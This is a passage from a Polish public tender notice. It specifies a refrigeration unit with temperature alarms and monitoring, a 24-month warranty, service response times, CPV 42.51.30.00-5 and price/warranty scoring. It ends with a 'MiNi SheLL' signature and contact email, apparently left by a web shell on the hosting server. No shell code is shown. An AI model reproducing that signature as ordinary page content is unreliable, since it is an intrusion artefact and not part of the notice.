13.musi zapewniać możliwość podłączenia do centralnego monitoringu temperatury (posiada port dostępu na wprowadzenie czujnika temperatury)
14.wyposażone jest w graficzny rejestrator temperatury,
15.musi być wyposażone w sygnalizację alarmową wizualną i dźwiękową o stanach awaryjnych: przekroczenia dopuszczalnej temperatury, zanik napięcia,
16.musi posiadać ekologiczny czynnik chłodniczy wolny od CFC,
17.system sterowania pracą sprężarki i system chłodzenia musi być cichy i niezawodny,
18.zasilanie prądem zmiennym 230 V, 
19.Wykonawca  musi zapewnić autoryzowany serwis na terenie Polski,
20.Wykonawca musi zapewnić bezpłatną instalację i bezpłatne szkolenie zakończone podpisaniem protokołu przekazania personelu nie później niż 7 dni od dostawy lub zgłoszenia takiej potrzeby przez zamawiającego,
21.Wykonawca  zapewnia bezpłatny transport urządzenia do miejsca wskazanego przez zamawiającego,
22.Wykonawca  musi dostarczyć  wraz z urządzeniem instrukcję obsługi w języku polskim,
23.Wykonawca  musi udzielić minimum 24 miesięcznej gwarancji na urządzenie,
24.w okresie gwarancji Wykonawca  zobowiązuje się do minimum 2 bezpłatnych (obejmujących koszt robocizny, dojazdu, materiałów zużywalnych) przeglądów gwarancyjnych w okresach wskazanych przez zamawiającego , 
25.czas reakcji serwisu w okresie gwarancji nie może przekraczać 48 godzin,
26.czas naprawy na terenie Polski - 7 dni,
27.na czas naprawy powyżej 7 dni dostawca zapewnia urządzenie zastępcze o parametrach równoważnych z naprawianym,
 Wymagane w ofercie dokumenty:
-deklaracja zgodności potwierdzająca oznakowanie wyrobu znakiem CE lub dokument równoważny,
-instrukcja w języku polskim
-specyfikacja techniczna producenta zaoferowanego powyżej urządzenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.51.30.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Gwarancja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com